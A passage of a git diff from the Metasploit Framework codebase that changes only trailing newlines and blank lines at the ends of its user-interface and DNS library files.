a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -118,4 +118,4 @@ _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/common.rb b/lib/msf/ui/common.rb index 02a12c1378..3859dd1b3b 100644 --- a/lib/msf/ui/common.rb +++ b/lib/msf/ui/common.rb @@ -30,4 +30,4 @@ class Common end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/console.rb b/lib/msf/ui/console.rb index 972af0e376..78b646090f 100644 --- a/lib/msf/ui/console.rb +++ b/lib/msf/ui/console.rb @@ -7,4 +7,4 @@ end end end -require 'msf/ui/console/driver' +require 'msf/ui/console/driver' \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index c7403fb087..c320a55cfd 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -111,5 +111,4 @@ end end end end -require 'msf/ui/console/command_dispatcher/core' - +require 'msf/ui/console/command_dispatcher/core' \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index 2e9376fc9f..bc1f6b4b21 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -146,4 +146,4 @@ class Auxiliary end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index bc9e9fc31a..569e474807 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1635,4 +1635,4 @@ protected end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 8234c9e4d1..bf24ad7e3c 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -482,4 +482,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/encoder.rb b/lib/msf/ui/console/command_dispatcher/encoder.rb index 7bf4e68090..56481794ca 100644 --- a/lib/msf/ui/console/command_dispatcher/encoder.rb +++ b/lib/msf/ui/console/command_dispatcher/encoder.rb @@ -28,4 +28,4 @@ class Encoder end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ddf77d0017..853f7ebca0 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -191,4 +191,4 @@ class Exploit end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/nop.rb b/lib/msf/ui/console/command_dispatcher/nop.rb index 63a7b7f4a0..f5d583a129 100644 --- a/lib/msf/ui/console/command_dispatcher/nop.rb +++ b/lib/msf/ui/console/command_dispatcher/nop.rb @@ -91,4 +91,4 @@ class Nop end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 1486e48ac3..2ea371d4fb 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -108,4 +108,4 @@ class Payload end -end end end end +end end end end \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/wmap.rb b/lib/msf/ui/console/command_dispatcher/wmap.rb index e1007e9d94..02b5d20a23 100644 --- a/lib/msf/ui/console/command_dispatcher/wmap.rb +++ b/lib/msf/ui/console/command_dispatcher/wmap.rb @@ -878,4 +878,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index c232b1a348..69d68bdfaa 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -381,4 +381,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/console/framework_event_manager.rb b/lib/msf/ui/console/framework_event_manager.rb index 691428c688..076a78fbb7 100644 --- a/lib/msf/ui/console/framework_event_manager.rb +++ b/lib/msf/ui/console/framework_event_manager.rb @@ -54,4 +54,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/console/table.rb b/lib/msf/ui/console/table.rb index f95be6a433..0d3d3e39ff 100644 --- a/lib/msf/ui/console/table.rb +++ b/lib/msf/ui/console/table.rb @@ -55,4 +55,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/driver.rb b/lib/msf/ui/driver.rb index 293c226cac..76a86ee81a 100644 --- a/lib/msf/ui/driver.rb +++ b/lib/msf/ui/driver.rb @@ -36,4 +36,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2.rb b/lib/msf/ui/gtk2.rb index a59c5e9c4f..59db55536e 100644 --- a/lib/msf/ui/gtk2.rb +++ b/lib/msf/ui/gtk2.rb @@ -32,4 +32,4 @@ module Msf end end -require 'msf/ui/gtk2/driver' +require 'msf/ui/gtk2/driver' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/about.rb b/lib/msf/ui/gtk2/about.rb index 14797f4949..968cc9860e 100644 --- a/lib/msf/ui/gtk2/about.rb +++ b/lib/msf/ui/gtk2/about.rb @@ -39,4 +39,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/app.rb b/lib/msf/ui/gtk2/app.rb index 87adda13f5..3ce5bfb42d 100644 --- a/lib/msf/ui/gtk2/app.rb +++ b/lib/msf/ui/gtk2/app.rb @@ -337,4 +337,4 @@ module Ui end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant.rb b/lib/msf/ui/gtk2/assistant.rb index 539e9dd425..28b4286ca3 100644 --- a/lib/msf/ui/gtk2/assistant.rb +++ b/lib/msf/ui/gtk2/assistant.rb @@ -2,4 +2,4 @@ require 'msf/ui/gtk2/assistant/skeleton' require 'msf/ui/gtk2/assistant/types' require 'msf/ui/gtk2/assistant/tips' require 'msf/ui/gtk2/assistant/exploit' -require 'msf/ui/gtk2/assistant/auxiliary' +require 'msf/ui/gtk2/assistant/auxiliary' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/auxiliary.rb b/lib/msf/ui/gtk2/assistant/auxiliary.rb index d0b5490e84..2d50ac8434 100644 --- a/lib/msf/ui/gtk2/assistant/auxiliary.rb +++ b/lib/msf/ui/gtk2/assistant/auxiliary.rb @@ -376,4 +376,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/exploit.rb b/lib/msf/ui/gtk2/assistant/exploit.rb index 82609385a4..e44ede331e 100644 --- a/lib/msf/ui/gtk2/assistant/exploit.rb +++ b/lib/msf/ui/gtk2/assistant/exploit.rb @@ -539,4 +539,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/skeleton.rb b/lib/msf/ui/gtk2/assistant/skeleton.rb index a56889db52..31177c8cd1 100644 --- a/lib/msf/ui/gtk2/assistant/skeleton.rb +++ b/lib/msf/ui/gtk2/assistant/skeleton.rb @@ -295,4 +295,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/tips.rb b/lib/msf/ui/gtk2/assistant/tips.rb index dbd175d5f7..4b93f5f13d 100644 --- a/lib/msf/ui/gtk2/assistant/tips.rb +++ b/lib/msf/ui/gtk2/assistant/tips.rb @@ -26,4 +26,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types.rb b/lib/msf/ui/gtk2/assistant/types.rb index 8832531c98..a377e01f9f 100644 --- a/lib/msf/ui/gtk2/assistant/types.rb +++ b/lib/msf/ui/gtk2/assistant/types.rb @@ -26,4 +26,4 @@ require 'msf/ui/gtk2/assistant/types/integer' # TODO #require 'msf/ui/gtk2/assistant/types/enum' -#require 'msf/ui/gtk2/assistant/types/addressrange' +#require 'msf/ui/gtk2/assistant/types/addressrange' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/address.rb b/lib/msf/ui/gtk2/assistant/types/address.rb index 2394938245..76e5b218af 100644 --- a/lib/msf/ui/gtk2/assistant/types/address.rb +++ b/lib/msf/ui/gtk2/assistant/types/address.rb @@ -76,4 +76,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/bool.rb b/lib/msf/ui/gtk2/assistant/types/bool.rb index 2074fba576..92983e4328 100644 --- a/lib/msf/ui/gtk2/assistant/types/bool.rb +++ b/lib/msf/ui/gtk2/assistant/types/bool.rb @@ -68,4 +68,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/integer.rb b/lib/msf/ui/gtk2/assistant/types/integer.rb index 5a7cda95e0..4ea5de97a4 100644 --- a/lib/msf/ui/gtk2/assistant/types/integer.rb +++ b/lib/msf/ui/gtk2/assistant/types/integer.rb @@ -68,4 +68,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/path.rb b/lib/msf/ui/gtk2/assistant/types/path.rb index 57492b50c3..b722bfa54e 100644 --- a/lib/msf/ui/gtk2/assistant/types/path.rb +++ b/lib/msf/ui/gtk2/assistant/types/path.rb @@ -66,4 +66,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/port.rb b/lib/msf/ui/gtk2/assistant/types/port.rb index 24cf756c4e..6d3e5fc52f 100644 --- a/lib/msf/ui/gtk2/assistant/types/port.rb +++ b/lib/msf/ui/gtk2/assistant/types/port.rb @@ -67,4 +67,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/raw.rb b/lib/msf/ui/gtk2/assistant/types/raw.rb index 722c7c1c34..360f3470c3 100644 --- a/lib/msf/ui/gtk2/assistant/types/raw.rb +++ b/lib/msf/ui/gtk2/assistant/types/raw.rb @@ -72,4 +72,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/skeleton.rb b/lib/msf/ui/gtk2/assistant/types/skeleton.rb index 865b97aebf..0b4ea9176a 100644 --- a/lib/msf/ui/gtk2/assistant/types/skeleton.rb +++ b/lib/msf/ui/gtk2/assistant/types/skeleton.rb @@ -40,4 +40,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/assistant/types/string.rb b/lib/msf/ui/gtk2/assistant/types/string.rb index 5082a10b14..b309981c53 100644 --- a/lib/msf/ui/gtk2/assistant/types/string.rb +++ b/lib/msf/ui/gtk2/assistant/types/string.rb @@ -69,4 +69,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/console/console.rb b/lib/msf/ui/gtk2/console/console.rb index 2e9be342f6..a804583946 100644 --- a/lib/msf/ui/gtk2/console/console.rb +++ b/lib/msf/ui/gtk2/console/console.rb @@ -121,4 +121,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/console/interactive_channel.rb b/lib/msf/ui/gtk2/console/interactive_channel.rb index f6df645f8c..c035653b69 100644 --- a/lib/msf/ui/gtk2/console/interactive_channel.rb +++ b/lib/msf/ui/gtk2/console/interactive_channel.rb @@ -96,4 +96,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/console/skeleton.rb b/lib/msf/ui/gtk2/console/skeleton.rb index b9b11c9090..c0d77eb4e4 100644 --- a/lib/msf/ui/gtk2/console/skeleton.rb +++ b/lib/msf/ui/gtk2/console/skeleton.rb @@ -331,4 +331,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/controls.rb b/lib/msf/ui/gtk2/controls.rb index 4acc5b03db..b878ce9ec0 100644 --- a/lib/msf/ui/gtk2/controls.rb +++ b/lib/msf/ui/gtk2/controls.rb @@ -36,4 +36,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/confirm.rb b/lib/msf/ui/gtk2/dialog/confirm.rb index 30294ae12a..7da1928ec1 100644 --- a/lib/msf/ui/gtk2/dialog/confirm.rb +++ b/lib/msf/ui/gtk2/dialog/confirm.rb @@ -35,4 +35,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/error.rb b/lib/msf/ui/gtk2/dialog/error.rb index 6b51e1d6d3..e1cb9cad4a 100644 --- a/lib/msf/ui/gtk2/dialog/error.rb +++ b/lib/msf/ui/gtk2/dialog/error.rb @@ -24,4 +24,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/payload.rb b/lib/msf/ui/gtk2/dialog/payload.rb index 02023e4c5d..cfc030966e 100644 --- a/lib/msf/ui/gtk2/dialog/payload.rb +++ b/lib/msf/ui/gtk2/dialog/payload.rb @@ -58,4 +58,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/skeleton_alert.rb b/lib/msf/ui/gtk2/dialog/skeleton_alert.rb index 98746e4c11..13c7f9fb75 100644 --- a/lib/msf/ui/gtk2/dialog/skeleton_alert.rb +++ b/lib/msf/ui/gtk2/dialog/skeleton_alert.rb @@ -39,4 +39,4 @@ module Msf end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/skeleton_basic.rb b/lib/msf/ui/gtk2/dialog/skeleton_basic.rb index 87559acabc..a5a45e733d 100644 --- a/lib/msf/ui/gtk2/dialog/skeleton_basic.rb +++ b/lib/msf/ui/gtk2/dialog/skeleton_basic.rb @@ -28,4 +28,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/skeleton_browser.rb b/lib/msf/ui/gtk2/dialog/skeleton_browser.rb index 6127dab60c..23007d7e48 100644 --- a/lib/msf/ui/gtk2/dialog/skeleton_browser.rb +++ b/lib/msf/ui/gtk2/dialog/skeleton_browser.rb @@ -396,4 +396,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/skeleton_textbuffer.rb b/lib/msf/ui/gtk2/dialog/skeleton_textbuffer.rb index a1b25272f1..079ae55264 100644 --- a/lib/msf/ui/gtk2/dialog/skeleton_textbuffer.rb +++ b/lib/msf/ui/gtk2/dialog/skeleton_textbuffer.rb @@ -137,4 +137,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/skeleton_tree.rb b/lib/msf/ui/gtk2/dialog/skeleton_tree.rb index 9968e812e5..fdc4a07959 100644 --- a/lib/msf/ui/gtk2/dialog/skeleton_tree.rb +++ b/lib/msf/ui/gtk2/dialog/skeleton_tree.rb @@ -25,4 +25,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialog/warning.rb b/lib/msf/ui/gtk2/dialog/warning.rb index 14a33c3fd1..68b6d624a3 100644 --- a/lib/msf/ui/gtk2/dialog/warning.rb +++ b/lib/msf/ui/gtk2/dialog/warning.rb @@ -24,4 +24,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/dialogs.rb b/lib/msf/ui/gtk2/dialogs.rb index 4791e732e6..45356c923a 100644 --- a/lib/msf/ui/gtk2/dialogs.rb +++ b/lib/msf/ui/gtk2/dialogs.rb @@ -8,4 +8,4 @@ require 'msf/ui/gtk2/dialog/payload' require 'msf/ui/gtk2/dialog/error' require 'msf/ui/gtk2/dialog/warning' require 'msf/ui/gtk2/dialog/information' -require 'msf/ui/gtk2/dialog/confirm' +require 'msf/ui/gtk2/dialog/confirm' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/driver.rb b/lib/msf/ui/gtk2/driver.rb index 873112ca0e..2a3b107fab 100644 --- a/lib/msf/ui/gtk2/driver.rb +++ b/lib/msf/ui/gtk2/driver.rb @@ -195,4 +195,4 @@ module Ui end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame.rb b/lib/msf/ui/gtk2/frame.rb index 4085a516a3..c63a1f194c 100644 --- a/lib/msf/ui/gtk2/frame.rb +++ b/lib/msf/ui/gtk2/frame.rb @@ -2,4 +2,4 @@ require 'msf/ui/gtk2/frame/modules_tree' require 'msf/ui/gtk2/frame/sessions_tree' require 'msf/ui/gtk2/frame/jobs_tree' require 'msf/ui/gtk2/frame/modules_view' -require 'msf/ui/gtk2/frame/tips' +require 'msf/ui/gtk2/frame/tips' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame/jobs_tree.rb b/lib/msf/ui/gtk2/frame/jobs_tree.rb index 0dac8c2d30..e00dfca3e3 100644 --- a/lib/msf/ui/gtk2/frame/jobs_tree.rb +++ b/lib/msf/ui/gtk2/frame/jobs_tree.rb @@ -241,4 +241,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame/modules_tree.rb b/lib/msf/ui/gtk2/frame/modules_tree.rb index f13c3faa0e..55fa1fa4cb 100644 --- a/lib/msf/ui/gtk2/frame/modules_tree.rb +++ b/lib/msf/ui/gtk2/frame/modules_tree.rb @@ -472,4 +472,4 @@ module Gtk2 end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame/modules_view.rb b/lib/msf/ui/gtk2/frame/modules_view.rb index caf517ec47..786701823d 100644 --- a/lib/msf/ui/gtk2/frame/modules_view.rb +++ b/lib/msf/ui/gtk2/frame/modules_view.rb @@ -87,4 +87,4 @@ module Gtk2 end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame/sessions_tree.rb b/lib/msf/ui/gtk2/frame/sessions_tree.rb index 151b058bc1..3750c26e97 100644 --- a/lib/msf/ui/gtk2/frame/sessions_tree.rb +++ b/lib/msf/ui/gtk2/frame/sessions_tree.rb @@ -233,4 +233,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/frame/tips.rb b/lib/msf/ui/gtk2/frame/tips.rb index f4213bbfc2..cabe162d5d 100644 --- a/lib/msf/ui/gtk2/frame/tips.rb +++ b/lib/msf/ui/gtk2/frame/tips.rb @@ -68,4 +68,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/framework_event_manager.rb b/lib/msf/ui/gtk2/framework_event_manager.rb index 1444119f12..99a9139c69 100644 --- a/lib/msf/ui/gtk2/framework_event_manager.rb +++ b/lib/msf/ui/gtk2/framework_event_manager.rb @@ -56,4 +56,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/meterpreter.rb b/lib/msf/ui/gtk2/meterpreter.rb index 5d38571dff..cba2dac6b4 100644 --- a/lib/msf/ui/gtk2/meterpreter.rb +++ b/lib/msf/ui/gtk2/meterpreter.rb @@ -1,3 +1,2 @@ require 'msf/ui/gtk2/meterpreter/stdapi/sys' -require 'msf/ui/gtk2/meterpreter/stdapi/fs' - +require 'msf/ui/gtk2/meterpreter/stdapi/fs' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/meterpreter/stdapi/fs.rb b/lib/msf/ui/gtk2/meterpreter/stdapi/fs.rb index d83580012b..d879918ebe 100644 --- a/lib/msf/ui/gtk2/meterpreter/stdapi/fs.rb +++ b/lib/msf/ui/gtk2/meterpreter/stdapi/fs.rb @@ -160,4 +160,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/meterpreter/stdapi/sys.rb b/lib/msf/ui/gtk2/meterpreter/stdapi/sys.rb index 7224a12c59..c86bb3136a 100644 --- a/lib/msf/ui/gtk2/meterpreter/stdapi/sys.rb +++ b/lib/msf/ui/gtk2/meterpreter/stdapi/sys.rb @@ -198,4 +198,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/groups.rb b/lib/msf/ui/gtk2/opcode/groups.rb index 9ef6720e87..fda3887a69 100644 --- a/lib/msf/ui/gtk2/opcode/groups.rb +++ b/lib/msf/ui/gtk2/opcode/groups.rb @@ -54,4 +54,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/locales.rb b/lib/msf/ui/gtk2/opcode/locales.rb index 7e0bec8302..c930e5c2e0 100644 --- a/lib/msf/ui/gtk2/opcode/locales.rb +++ b/lib/msf/ui/gtk2/opcode/locales.rb @@ -56,4 +56,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/metatypes.rb b/lib/msf/ui/gtk2/opcode/metatypes.rb index 7a1ff742d7..804fe3097a 100644 --- a/lib/msf/ui/gtk2/opcode/metatypes.rb +++ b/lib/msf/ui/gtk2/opcode/metatypes.rb @@ -54,4 +54,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/modules.rb b/lib/msf/ui/gtk2/opcode/modules.rb index 905fef1bb9..ce32eff845 100644 --- a/lib/msf/ui/gtk2/opcode/modules.rb +++ b/lib/msf/ui/gtk2/opcode/modules.rb @@ -177,4 +177,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/platforms.rb b/lib/msf/ui/gtk2/opcode/platforms.rb index a11be6397c..df44d2b4f4 100644 --- a/lib/msf/ui/gtk2/opcode/platforms.rb +++ b/lib/msf/ui/gtk2/opcode/platforms.rb @@ -58,4 +58,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/skeleton.rb b/lib/msf/ui/gtk2/opcode/skeleton.rb index f22f6e566c..61fc7a5967 100755 --- a/lib/msf/ui/gtk2/opcode/skeleton.rb +++ b/lib/msf/ui/gtk2/opcode/skeleton.rb @@ -41,4 +41,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/stats.rb b/lib/msf/ui/gtk2/opcode/stats.rb index 718fb2ae14..f68290c695 100644 --- a/lib/msf/ui/gtk2/opcode/stats.rb +++ b/lib/msf/ui/gtk2/opcode/stats.rb @@ -64,4 +64,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/opcode/types.rb b/lib/msf/ui/gtk2/opcode/types.rb index 2b49006cc9..91bcbbe76a 100644 --- a/lib/msf/ui/gtk2/opcode/types.rb +++ b/lib/msf/ui/gtk2/opcode/types.rb @@ -58,4 +58,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/preferences/databases.rb b/lib/msf/ui/gtk2/preferences/databases.rb index 96d19efbb2..8308b98358 100644 --- a/lib/msf/ui/gtk2/preferences/databases.rb +++ b/lib/msf/ui/gtk2/preferences/databases.rb @@ -58,4 +58,4 @@ module Msf end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/preferences/main.rb b/lib/msf/ui/gtk2/preferences/main.rb index bbb0567494..27b6d14570 100644 --- a/lib/msf/ui/gtk2/preferences/main.rb +++ b/lib/msf/ui/gtk2/preferences/main.rb @@ -61,4 +61,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/search.rb b/lib/msf/ui/gtk2/search.rb index 05534fd750..bb0db82c84 100644 --- a/lib/msf/ui/gtk2/search.rb +++ b/lib/msf/ui/gtk2/search.rb @@ -115,4 +115,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/treeviewtooltips.rb b/lib/msf/ui/gtk2/treeviewtooltips.rb index eb8981df1f..5bf8ce6ccc 100644 --- a/lib/msf/ui/gtk2/treeviewtooltips.rb +++ b/lib/msf/ui/gtk2/treeviewtooltips.rb @@ -198,4 +198,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/window.rb b/lib/msf/ui/gtk2/window.rb index 8447164c53..d2c54deec9 100644 --- a/lib/msf/ui/gtk2/window.rb +++ b/lib/msf/ui/gtk2/window.rb @@ -1,4 +1,4 @@ require 'msf/ui/gtk2/window/logs' require 'msf/ui/gtk2/window/auxiliary' require 'msf/ui/gtk2/window/consoles' -require 'msf/ui/gtk2/window/codeview' +require 'msf/ui/gtk2/window/codeview' \ No newline at end of file diff --git a/lib/msf/ui/gtk2/window/auxiliary.rb b/lib/msf/ui/gtk2/window/auxiliary.rb index 885400624c..05884088ae 100644 --- a/lib/msf/ui/gtk2/window/auxiliary.rb +++ b/lib/msf/ui/gtk2/window/auxiliary.rb @@ -92,4 +92,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/window/codeview.rb b/lib/msf/ui/gtk2/window/codeview.rb index 05d0c016fc..4fb6ad7609 100644 --- a/lib/msf/ui/gtk2/window/codeview.rb +++ b/lib/msf/ui/gtk2/window/codeview.rb @@ -126,4 +126,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/window/consoles.rb b/lib/msf/ui/gtk2/window/consoles.rb index 172ffa0492..2f7500b4dd 100644 --- a/lib/msf/ui/gtk2/window/consoles.rb +++ b/lib/msf/ui/gtk2/window/consoles.rb @@ -410,4 +410,4 @@ class MsfWindow end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/gtk2/window/logs.rb b/lib/msf/ui/gtk2/window/logs.rb index e9994f841d..97451d31f5 100644 --- a/lib/msf/ui/gtk2/window/logs.rb +++ b/lib/msf/ui/gtk2/window/logs.rb @@ -44,4 +44,4 @@ module Msf end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/web.rb b/lib/msf/ui/web.rb index d9e294aeba..cd87ccf947 100644 --- a/lib/msf/ui/web.rb +++ b/lib/msf/ui/web.rb @@ -11,4 +11,4 @@ end end end -require 'msf/ui/web/driver' +require 'msf/ui/web/driver' \ No newline at end of file diff --git a/lib/msf/ui/web/comm.rb b/lib/msf/ui/web/comm.rb index 9df757895e..50b7b4130f 100644 --- a/lib/msf/ui/web/comm.rb +++ b/lib/msf/ui/web/comm.rb @@ -150,4 +150,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/web/console.rb b/lib/msf/ui/web/console.rb index 9290f7742d..0524f474e6 100644 --- a/lib/msf/ui/web/console.rb +++ b/lib/msf/ui/web/console.rb @@ -126,4 +126,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/web/driver.rb b/lib/msf/ui/web/driver.rb index 47dcf72abd..6779913f57 100644 --- a/lib/msf/ui/web/driver.rb +++ b/lib/msf/ui/web/driver.rb @@ -157,4 +157,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/ui/wx.rb b/lib/msf/ui/wx.rb index 22daada971..edd68cab06 100644 --- a/lib/msf/ui/wx.rb +++ b/lib/msf/ui/wx.rb @@ -11,4 +11,4 @@ end end end -require 'msf/ui/wx/driver' +require 'msf/ui/wx/driver' \ No newline at end of file diff --git a/lib/net/dns.rb b/lib/net/dns.rb index 7b24483e98..a04abde26f 100755 --- a/lib/net/dns.rb +++ b/lib/net/dns.rb @@ -1 +1 @@ -require "net/dns/resolver" +require "net/dns/resolver" \ No newline at end of file diff --git a/lib/net/dns/dns.rb b/lib/net/dns/dns.rb index 1214ea5bac..caf4aafd36 100644 --- a/lib/net/dns/dns.rb +++ b/lib/net/dns/dns.rb @@ -114,4 +114,4 @@ module Net # :nodoc: include QueryClasses end # module DNS -end # module Net +end # module Net \ No newline at end of file diff --git a/lib/net/dns/header.rb b/lib/net/dns/header.rb index e5ffcc6139..6eb74477c7 100644 --- a/lib/net/dns/header.rb +++ b/lib/net/dns/header.rb @@ -758,4 +758,4 @@ class HeaderWrongOpcode < ArgumentError # :nodoc: all end class HeaderDuplicateID < ArgumentError # :nodoc: all -end +end \ No newline at end of file diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb index 01937d0215..4c1b02033e 100644 --- a/lib/net/dns/names/names.rb +++ b/lib/net/dns/names/names.rb @@ -106,4 +106,4 @@ module Net # :nodoc: end # module Net class ExpandError < StandardError # :nodoc: -end +end \ No newline at end of file diff --git a/lib/net/dns/packet.rb b/lib/net/dns/packet.rb index 0f4f34bbaa..52139be917 100644 --- a/lib/net/dns/packet.rb +++ b/lib/net/dns/packet.rb @@ -567,4 +567,4 @@ end # module Net class PacketError < StandardError # :nodoc: end class PacketArgumentError < ArgumentError # :nodoc: -end +end \ No newline at end of file diff --git a/lib/net/dns/question.rb b/lib/net/dns/question.rb index 9eb6158535..dd9543edaf 100644 --- a/lib/net/dns/question.rb +++ b/lib/net/dns/question.rb @@ -192,4 +192,4 @@ end # module Net class QuestionArgumentError < ArgumentError # :nodoc: end class QuestionNameError < StandardError # :nodoc: -end +end \ No newline at end of file diff --git a/lib/net/dns/resolver.rb b/lib/net/dns/resolver.rb index b8a4a20f1e..748314052f 100644 --- a/lib/net/dns/resolver.rb +++ b/lib/net/dns/resolver.rb @@ -1217,16 +1217,4 @@ end class Hash # :nodoc: include ExtendHash -end - - - - - - - - - - - - +end \ No newline at end of file diff --git a/lib/net/dns/resolver/socks.rb b/lib/net/dns/resolver/socks.rb index 45f5dead75..a732e55f27 100644 --- a/lib/net/dns/resolver/socks.rb +++ b/lib/net/dns/resolver/socks.rb @@ -150,5 +150,4 @@ class UdpRawSocket < RawSocket # :nodoc: ]) end -end - +end \ No newline at end of file diff --git a/lib/net/dns/resolver/timeouts.rb b/lib/net/dns/resolver/timeouts.rb index e0b4f1942a..a823ddb49c 100644 --- a/lib/net/dns/resolver/timeouts.rb +++ b/lib/net/dns/resolver/timeouts.rb @@ -70,4 